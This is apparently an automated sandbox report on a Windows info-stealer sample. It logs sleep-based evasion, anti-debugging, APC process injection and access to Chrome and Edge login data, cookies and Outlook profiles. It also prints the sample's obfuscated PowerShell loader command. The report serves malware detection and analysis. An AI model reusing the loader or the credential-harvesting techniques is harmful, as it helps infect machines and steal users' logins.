Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599016
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598891
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598759
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598654
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598542
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598427
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598312
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 598093
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597984
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597875
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597766
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597656
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597547
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597437
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597328
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597219
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 597094
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596875
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596766
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596438
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596313
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596203
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 596094
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595966
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595808
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595694
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595577
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595469
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595250
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595141
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 595031
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594922
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594812
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594703
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594594
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 594469
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2986
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Window / User API: threadDelayed 1559
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Window / User API: threadDelayed 8297
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe API coverage: 2.5 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 964 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220 Thread sleep count: 1559 > 30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220 Thread sleep count: 8297 > 30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599342s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -599016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598759s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598654s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598542s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598427s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -598093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597219s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -597094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596547s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596438s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -596094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595966s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595808s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595694s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595577s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595359s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -595031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436 Thread sleep time: -594469s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C13
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040683D FindFirstFileW,FindClose, 0_2_0040683D
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040290B FindFirstFileW, 11_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 11_2_00405C13
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0040683D FindFirstFileW,FindClose, 11_2_0040683D
Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\jr
Source: ModuleAnalysisCache.1.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\jr
Source: ModuleAnalysisCache.1.dr Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\jr
Source: svchost.exe, 00000004.00000002.2252344812.000002527EE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251666504.0000025204455000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251618487.0000025204441000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.1.dr Binary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00401C43 LdrInitializeThunk,LdrInitializeThunk,SendMessageTimeoutW,SendMessageW,FindWindowExW, 11_2_00401C43
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Nonalined.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Nonalined.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Nonalined.exe base: 16C0000
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_70A01096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree, 0_2_70A01096
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Nonalined.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004034F7
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match File source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR